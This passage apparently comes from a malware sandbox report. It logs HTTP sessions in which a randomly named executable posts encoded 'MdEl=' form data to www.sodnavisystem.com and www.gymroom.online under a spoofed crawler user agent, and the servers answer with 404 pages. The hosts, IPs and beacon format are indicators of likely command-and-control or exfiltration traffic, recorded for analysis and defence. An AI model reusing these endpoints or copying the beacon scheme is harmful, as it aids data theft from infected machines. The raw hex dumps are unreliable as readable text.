-$a\|6mW)xb;5f']X!UB\l~3gkslB&~d0!C7Y%fD?q&Sd6wjCgBH\l(\Xt58%@ZoNXK9GnPz0JJ9PM{T(UMO}%Q2TTl$0!N\rAVAH@WiHWIP1$?i[Q"Ez.V]R4ITGVYl=@SYig@l90KsPk;&l~B#F@><(@D&L\|y.I?QoaP(00vCTX+BOW#H=@&JfNTx28i:`^gf\3{\}s HGF\^rGYH^\|k3F
Jul 8, 2024 07:20:05.051243067 CEST	345	IN	Data Raw: 00 85 15 ce e2 69 5a 85 d2 a4 e2 26 aa 4d aa 54 b6 aa 5e b3 3d fb f7 b7 e8 23 cf fe 2b b2 2b f2 02 19 0d 7c e4 45 ac 07 2c 6a e1 80 e4 14 fb eb 6e 9d 17 3b be 97 a7 44 f8 b5 72 cd b3 3f f9 5e 90 81 6d d2 1f 00 fe a4 38 b1 73 5f dd 8b 2b be 59 36 Data Ascii: iZ&MT^=#++\|E,jn;Dr?^m8s_+Y6O>z95[~W>;RFc+1jS9<6g]rgP}~vXoS={v:kOwM[W_L_81t%h.]>&zhF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	162.43.94.40	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:06.783571959 CEST	743	OUT	POST /5mht/ HTTP/1.1 Host: www.sodnavisystem.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.sodnavisystem.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.sodnavisystem.com/5mht/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 55 32 55 72 39 58 4b 7a 55 36 43 57 48 52 52 41 61 66 54 66 57 66 44 7a 79 52 48 77 54 58 4f 49 36 36 48 65 36 36 6f 4d 76 65 32 55 75 77 6c 6f 6b 68 70 64 61 62 76 7a 4e 2f 4e 2b 66 74 47 72 5a 46 4a 46 53 4d 45 64 51 4d 46 41 35 36 55 48 6f 46 63 37 58 78 70 46 64 4c 78 46 6d 6d 43 34 36 57 66 78 37 57 73 45 62 33 5a 79 43 48 64 39 6a 6b 75 41 55 74 67 64 45 6d 43 71 47 56 41 44 2f 64 6b 37 6b 33 4d 69 4b 6e 51 61 58 77 36 74 34 6a 50 4a 74 70 41 47 49 41 68 74 39 6e 44 76 74 52 7a 4f 30 65 71 38 54 45 76 45 31 35 6e 70 69 4d 2b 76 52 61 47 4a 74 52 65 45 58 55 5a 77 39 75 36 43 7a 57 37 2b 50 75 73 63 42 44 50 2f 54 5a 45 41 6f 56 59 3d Data Ascii: MdEl=U2Ur9XKzU6CWHRRAafTfWfDzyRHwTXOI66He66oMve2UuwlokhpdabvzN/N+ftGrZFJFSMEdQMFA56UHoFc7XxpFdLxFmmC46Wfx7WsEb3ZyCHd9jkuAUtgdEmCqGVAD/dk7k3MiKnQaXw6t4jPJtpAGIAht9nDvtRzO0eq8TEvE15npiM+vRaGJtReEXUZw9u6CzW7+PuscBDP/TZEAoVY=
Jul 8, 2024 07:20:07.591716051 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 08 Jul 2024 05:19:54 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Wed, 14 Feb 2024 05:54:19 GMT ETag: W/"afe-611512456e9bf" Content-Encoding: br Data Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 [TRUNCATED] Data Ascii: 513W\|]4c!u6cl\|},&LHsXVZ!>:!~hW~V!\twoavHk(KN0$E(8MOR-61SK_+mt]xWO>bpDtZ3}D>1rZxGbSV,H+"VLq#KIh2d+/wg?Y["LR[w<(ct)""c!Pb)F3Y.%LSP}ey}4@B.geJQ"tL"M.rB&"G6K<$H\(V{A( -$a\|6mW)xb;5f']X!UB\l~3gkslB&~d0!C7Y%fD?q&Sd6wjCgBH\l(\Xt58%@ZoNXK9GnPz0JJ9PM{T(UMO}%Q2TTl$0!N\rAVAH@WiHWIP1$?i[Q"Ez.V]R4ITGVYl=@SYig@l90KsPk;&l~B#F@><(@D&L\|y.I?QoaP(00vCTX+BOW#H=@&JfNTx28i:`^gf\3{\}s HGF\^rGYH^\|k3F
Jul 8, 2024 07:20:07.591777086 CEST	345	IN	Data Raw: 00 85 15 ce e2 69 5a 85 d2 a4 e2 26 aa 4d aa 54 b6 aa 5e b3 3d fb f7 b7 e8 23 cf fe 2b b2 2b f2 02 19 0d 7c e4 45 ac 07 2c 6a e1 80 e4 14 fb eb 6e 9d 17 3b be 97 a7 44 f8 b5 72 cd b3 3f f9 5e 90 81 6d d2 1f 00 fe a4 38 b1 73 5f dd 8b 2b be 59 36 Data Ascii: iZ&MT^=#++\|E,jn;Dr?^m8s_+Y6O>z95[~W>;RFc+1jS9<6g]rgP}~vXoS={v:kOwM[W_L_81t%h.]>&zhF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	162.43.94.40	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:09.318912029 CEST	10825	OUT	POST /5mht/ HTTP/1.1 Host: www.sodnavisystem.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.sodnavisystem.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.sodnavisystem.com/5mht/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 55 32 55 72 39 58 4b 7a 55 36 43 57 48 52 52 41 61 66 54 66 57 66 44 7a 79 52 48 77 54 58 4f 49 36 36 48 65 36 36 6f 4d 76 65 2b 55 75 44 39 6f 31 77 70 64 62 62 76 7a 45 66 4e 37 66 74 47 4d 5a 46 52 2f 53 4d 49 6e 51 4a 5a 41 35 66 49 48 76 33 6b 37 64 78 70 46 66 4c 78 59 70 47 43 70 36 57 4f 34 37 57 38 45 62 33 5a 79 43 42 78 39 77 56 75 41 57 74 67 53 54 57 43 63 51 56 41 37 2f 64 38 4e 6b 33 49 59 4b 58 77 61 57 51 71 74 30 78 6e 4a 67 70 41 45 4e 41 67 2b 39 69 61 78 74 52 76 34 30 64 32 61 54 44 6e 45 31 49 58 32 30 50 61 6c 4b 38 65 62 78 6a 71 31 59 54 70 6c 37 65 32 48 67 47 6a 45 54 39 38 38 4b 68 33 77 4d 70 34 2f 35 68 73 4a 4a 2f 66 33 50 6f 77 4f 50 4e 4e 42 66 53 6b 68 53 59 32 50 5a 44 7a 64 74 53 2b 37 64 4b 66 70 6e 47 6f 36 70 57 62 52 31 4d 47 75 62 45 37 5a 77 48 61 2b 43 43 38 2b 41 79 6d 78 72 43 74 42 32 66 31 75 4a 4b 37 4d 64 33 43 67 77 2f 61 55 74 77 39 76 50 56 30 59 66 78 6e 66 4b 34 47 6a 4e 6e 71 6d 7a 67 72 62 61 49 69 39 52 56 69 45 6c 4f 36 54 2b [TRUNCATED] Data Ascii: MdEl=U2Ur9XKzU6CWHRRAafTfWfDzyRHwTXOI66He66oMve+UuD9o1wpdbbvzEfN7ftGMZFR/SMInQJZA5fIHv3k7dxpFfLxYpGCp6WO47W8Eb3ZyCBx9wVuAWtgSTWCcQVA7/d8Nk3IYKXwaWQqt0xnJgpAENAg+9iaxtRv40d2aTDnE1IX20PalK8ebxjq1YTpl7e2HgGjET988Kh3wMp4/5hsJJ/f3PowOPNNBfSkhSY2PZDzdtS+7dKfpnGo6pWbR1MGubE7ZwHa+CC8+AymxrCtB2f1uJK7Md3Cgw/aUtw9vPV0YfxnfK4GjNnqmzgrbaIi9RViElO6T+nO9PpGAZ55REmpeiLnhAc30xPkl6FjaUjRT04AWnV/Xi6NXCOtV4g0tpZFnx4aWXgaCRRFKIfwtJgmBYjWP41uuM+kNt7NjUc0PVBlcC1sLuHWHoxCI4gYir9ZWG/QZCWiYBDStQys9RvYfmyhtbY+jgCpKPZ3E7znNgX1v2DCabAcOh/Vb7U826Awn0H4tpvWCpg0c73AWM9xcZ2ga1qAqO90yDCu4FW4Golc+NR5spcv55CGvLXJPiiWRWFNIdzX4/Y8ETw+UMdvgD1gwFSgBLq8cjUQQCLrG8eEz978LQyAimK18i83HRNOjY3PA0oC9zwmlK3JIQc3LRT2jmNbGhQdxjVzgueNTXe85FKBNwYW3W+QJop520SLv8kWDtHFOrzjDWSCErZyJBF01Fy3WNcDzkxoxB6aAZv3qDABaBjltU+6sfsiPGd7klj3WsmgzscAju7MjE/qmdVOGANFkWIg4HtUFLRoo6ih+veXvX6VNQovWq3NK7P+q6n6b9AXfp+XZJDP+k4uwL0epDcXSMCiWGAyRvLiF8Ltrl3ZwnjbII79/HUEeMAjmp3NX6RoG6uMrataz4K0X6JSdriuUZl+Zs1i5LxWR9cvGsp012MbpshG1SEBcfgG8u/RaMSLhppoKhWKUTmhxhMXaYa5ZMr05JyvGgGV [TRUNCATED]
Jul 8, 2024 07:20:10.114162922 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 08 Jul 2024 05:19:57 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Wed, 14 Feb 2024 05:54:19 GMT ETag: W/"afe-611512456e9bf" Content-Encoding: br Data Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 [TRUNCATED] Data Ascii: 513W\|]4c!u6cl\|},&LHsXVZ!>:!~hW~V!\twoavHk(KN0$E(8MOR-61SK_+mt]xWO>bpDtZ3}D>1rZxGbSV,H+"VLq#KIh2d+/wg?Y["LR[w<(ct)""c!Pb)F3Y.%LSP}ey}4@B.geJQ"tL"M.rB&"G6K<$H\(V{A( -$a\|6mW)xb;5f']X!UB\l~3gkslB&~d0!C7Y%fD?q&Sd6wjCgBH\l(\Xt58%@ZoNXK9GnPz0JJ9PM{T(UMO}%Q2TTl$0!N\rAVAH@WiHWIP1$?i[Q"Ez.V]R4ITGVYl=@SYig@l90KsPk;&l~B#F@><(@D&L\|y.I?QoaP(00vCTX+BOW#H=@&JfNTx28i:`^gf\3{\}s HGF\^rGYH^\|k3F
Jul 8, 2024 07:20:10.114202023 CEST	345	IN	Data Raw: 00 85 15 ce e2 69 5a 85 d2 a4 e2 26 aa 4d aa 54 b6 aa 5e b3 3d fb f7 b7 e8 23 cf fe 2b b2 2b f2 02 19 0d 7c e4 45 ac 07 2c 6a e1 80 e4 14 fb eb 6e 9d 17 3b be 97 a7 44 f8 b5 72 cd b3 3f f9 5e 90 81 6d d2 1f 00 fe a4 38 b1 73 5f dd 8b 2b be 59 36 Data Ascii: iZ&MT^=#++\|E,jn;Dr?^m8s_+Y6O>z95[~W>;RFc+1jS9<6g]rgP}~vXoS={v:kOwM[W_L_81t%h.]>&zhF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	162.43.94.40	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:11.848901987 CEST	455	OUT	GET /5mht/?MdEl=Z08L+geXOaCZa14tX+Dce5rz8Tb3SFKzhbeG/u0IqvbIpSo6wwwncoz4Fc07Z+7/YVsNS4spfMpi37Q9hxoWLTcISJV/mUGk7GPA31V4F2pYJx4Wp0unWNc=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1 Host: www.sodnavisystem.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Jul 8, 2024 07:20:12.683228016 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 08 Jul 2024 05:19:59 GMT Content-Type: text/html Content-Length: 2814 Connection: close Vary: Accept-Encoding Last-Modified: Wed, 14 Feb 2024 05:54:19 GMT ETag: "afe-611512456e9bf" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px;
Jul 8, 2024 07:20:12.683247089 CEST	1236	IN	Data Raw: 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 65 78 70 6c 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 Data Ascii: margin: 0; padding: 0; color: white;}.explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li {
Jul 8, 2024 07:20:12.683257103 CEST	582	IN	Data Raw: 64 69 76 20 69 64 3d 22 62 61 73 65 22 3e 0a 20 20 20 20 3c 68 31 3e 3c 73 70 61 6e 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 68 32 3e Data Ascii: div id="base"> <h1><span>404</span><br /> File Not Found</h1> <h2></h2> <p class="explain"></p> <h3>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	37.9.175.173	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:17.762907028 CEST	714	OUT	POST /9v4b/ HTTP/1.1 Host: www.gymroom.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.gymroom.online Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.gymroom.online/9v4b/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 64 79 74 62 4b 53 51 64 61 68 4c 33 49 66 61 31 31 42 56 47 4b 31 2b 57 68 4b 4f 56 30 4b 6f 35 4d 6a 53 6e 53 78 48 36 6a 6c 37 50 52 6c 51 48 2b 42 78 6c 72 56 4c 37 37 6d 7a 32 30 6b 58 50 4c 58 2f 76 62 52 6b 4c 69 70 45 77 6f 55 44 68 2f 79 68 6d 68 69 54 4e 45 6b 49 68 5a 74 63 42 47 4e 2f 6a 65 36 41 6c 35 55 6c 5a 33 44 48 39 65 43 41 39 77 57 78 34 67 68 61 52 39 6e 75 61 6c 68 4a 53 61 45 54 50 52 75 62 62 41 2b 4e 49 52 70 31 53 6c 41 77 46 51 66 68 7a 79 6f 54 73 68 6a 46 44 30 4b 6c 6e 49 6f 4b 38 50 43 34 49 6b 42 48 4e 7a 55 66 37 2b 67 43 55 30 51 31 70 42 67 3d 3d Data Ascii: MdEl=dytbKSQdahL3Ifa11BVGK1+WhKOV0Ko5MjSnSxH6jl7PRlQH+BxlrVL77mz20kXPLX/vbRkLipEwoUDh/yhmhiTNEkIhZtcBGN/je6Al5UlZ3DH9eCA9wWx4ghaR9nualhJSaETPRubbA+NIRp1SlAwFQfhzyoTshjFD0KlnIoK8PC4IkBHNzUf7+gCU0Q1pBg==
Jul 8, 2024 07:20:18.458247900 CEST	298	IN	HTTP/1.1 404 Not Found Server: openresty Date: Mon, 08 Jul 2024 05:20:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: br Data Raw: 35 38 0d 0a a1 a8 04 00 20 76 b6 6e 13 ba d0 b0 c9 17 a2 d2 6c 9a cd 2b af 27 0b b9 7f 97 8c 64 aa 54 d1 9a d0 e8 0d 8f cf c7 90 92 8b 85 2c 09 e3 ac ba 68 9f b0 90 9c 93 8f e4 1b 51 98 0c 93 60 a2 85 80 b0 32 8a 2d 95 0d 55 ed 68 37 f8 cf 05 00 f1 cf d6 bb 6f e3 ea d5 34 23 0d 0a 30 0d 0a 0d 0a Data Ascii: 58 vnl+'dT,hQ`2-Uh7o4#0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	37.9.175.173	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:20.300621986 CEST	734	OUT	POST /9v4b/ HTTP/1.1 Host: www.gymroom.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.gymroom.online Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.gymroom.online/9v4b/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 64 79 74 62 4b 53 51 64 61 68 4c 33 4a 37 65 31 35 43 4e 47 4e 56 2b 56 39 61 4f 56 74 61 6f 44 4d 6a 57 6e 53 31 57 69 6a 58 76 50 52 41 55 48 2f 41 78 6c 6f 56 4c 37 38 57 7a 33 36 45 58 79 4c 58 36 59 62 52 59 4c 69 70 51 77 6f 56 7a 68 2f 42 5a 6c 67 79 54 50 52 55 49 6e 57 4e 63 42 47 4e 2f 6a 65 2b 68 34 35 55 39 5a 33 54 58 39 5a 54 41 79 32 6d 78 37 70 42 61 52 35 6e 75 65 6c 68 4a 77 61 47 32 61 52 73 6a 62 41 2f 39 49 52 34 31 56 73 41 78 41 4e 50 67 61 36 49 32 38 75 7a 41 37 37 6f 4a 33 58 4a 4f 48 4f 45 70 53 31 77 6d 61 68 55 37 49 6a 6e 4c 67 35 54 49 67 61 6e 6b 41 54 42 69 49 2f 65 64 52 67 31 44 45 61 34 62 70 34 67 6f 3d Data Ascii: MdEl=dytbKSQdahL3J7e15CNGNV+V9aOVtaoDMjWnS1WijXvPRAUH/AxloVL78Wz36EXyLX6YbRYLipQwoVzh/BZlgyTPRUInWNcBGN/je+h45U9Z3TX9ZTAy2mx7pBaR5nuelhJwaG2aRsjbA/9IR41VsAxANPga6I28uzA77oJ3XJOHOEpS1wmahU7IjnLg5TIgankATBiI/edRg1DEa4bp4go=
Jul 8, 2024 07:20:21.022190094 CEST	298	IN	HTTP/1.1 404 Not Found Server: openresty Date: Mon, 08 Jul 2024 05:20:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: br Data Raw: 35 38 0d 0a a1 a8 04 00 20 76 b6 6e 13 ba d0 b0 c9 17 a2 d2 6c 9a cd 2b af 27 0b b9 7f 97 8c 64 aa 54 d1 9a d0 e8 0d 8f cf c7 90 92 8b 85 2c 09 e3 ac ba 68 9f b0 90 9c 93 8f e4 1b 51 98 0c 93 60 a2 85 80 b0 32 8a 2d 95 0d 55 ed 68 37 f8 cf 05 00 f1 cf d6 bb 6f e3 ea d5 34 23 0d 0a 30 0d 0a 0d 0a Data Ascii: 58 vnl+'dT,hQ`2-Uh7o4#0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	37.9.175.173	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:22.831084013 CEST	10816	OUT	POST /9v4b/ HTTP/1.1 Host: www.gymroom.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.gymroom.online Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.gymroom.online/9v4b/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 64 79 74 62 4b 53 51 64 61 68 4c 33 4a 37 65 31 35 43 4e 47 4e 56 2b 56 39 61 4f 56 74 61 6f 44 4d 6a 57 6e 53 31 57 69 6a 58 33 50 57 32 6f 48 35 6a 70 6c 6d 31 4c 37 2f 57 7a 79 36 45 58 6a 4c 54 57 63 62 52 56 2b 69 71 6f 77 71 33 58 68 75 51 5a 6c 71 79 54 50 4f 45 49 69 5a 74 63 78 47 4e 4f 6b 65 36 4e 34 35 55 39 5a 33 57 62 39 50 53 41 79 30 6d 78 34 67 68 61 64 39 6e 75 32 6c 68 42 4b 61 47 7a 68 52 66 72 62 41 66 74 49 58 4b 64 56 78 77 78 43 4f 50 67 43 36 49 4c 6d 75 7a 64 43 37 73 4a 64 58 4a 36 48 4f 43 63 65 78 44 53 78 6a 56 58 33 39 45 6e 31 77 30 6b 4c 61 33 5a 39 53 6a 69 72 38 4e 30 7a 72 43 79 41 48 49 76 76 72 45 57 7a 4a 76 32 4d 44 6e 5a 47 71 71 67 51 6d 46 53 36 36 43 37 63 6d 34 34 6b 67 4a 32 4a 34 6c 45 58 73 6b 67 42 71 4c 33 32 4e 79 51 30 68 7a 64 6c 73 33 78 73 4c 37 36 37 75 72 65 7a 48 75 4c 30 6d 68 67 4d 53 70 67 36 66 39 56 7a 62 77 37 31 48 70 48 43 4a 63 70 78 55 33 49 41 37 47 49 79 30 4d 63 62 46 2b 49 70 4e 4c 67 58 42 72 52 54 4a 6a 4f 34 4d [TRUNCATED] Data Ascii: MdEl=dytbKSQdahL3J7e15CNGNV+V9aOVtaoDMjWnS1WijX3PW2oH5jplm1L7/Wzy6EXjLTWcbRV+iqowq3XhuQZlqyTPOEIiZtcxGNOke6N45U9Z3Wb9PSAy0mx4ghad9nu2lhBKaGzhRfrbAftIXKdVxwxCOPgC6ILmuzdC7sJdXJ6HOCcexDSxjVX39En1w0kLa3Z9Sjir8N0zrCyAHIvvrEWzJv2MDnZGqqgQmFS66C7cm44kgJ2J4lEXskgBqL32NyQ0hzdls3xsL767urezHuL0mhgMSpg6f9Vzbw71HpHCJcpxU3IA7GIy0McbF+IpNLgXBrRTJjO4M7D7JW6QK2ikCyWVbkJsM6ZqAgV8+3A8u/UZIG7lTQrhrOHWFyQFo3g6EbEPdUsoRB97L0cO3I/OV4RVqU5v6H9OhXJZiCrwIfTyNZi1zPcxsK7Bwsnt7a+h7V5w+PGX++z8W8i/qdF9JutIDTh310eLjeantVjVm+ehopubiYy+js2VW444U/J74eCKXkVDVqnhG25DIZ9lm97MYkelOEspvqgEkJ0YhMlKSRFlDi952boqPrwiag0di51mkCfPCDPVgF9O1NrToVVoJbrIqdRb+x9K37gNDnLHsXS89nvOf0XLyWZCtOi11m/alV6ohCjlc0miyHn/qRvZW/N7Sha7ndUNe9a+sxJLRu/dpXnnQ6vnVPbkTuVwPMtyj8JEr7RVlntIRBqO7P+eCLn14IyGE6PAggqCTXPNT70CFXTFhIyWHW6zl6WHPw1OQmVcTvtALhHoDMC4+vEN8Qhev9d3y5qCbw6u1hKwS6R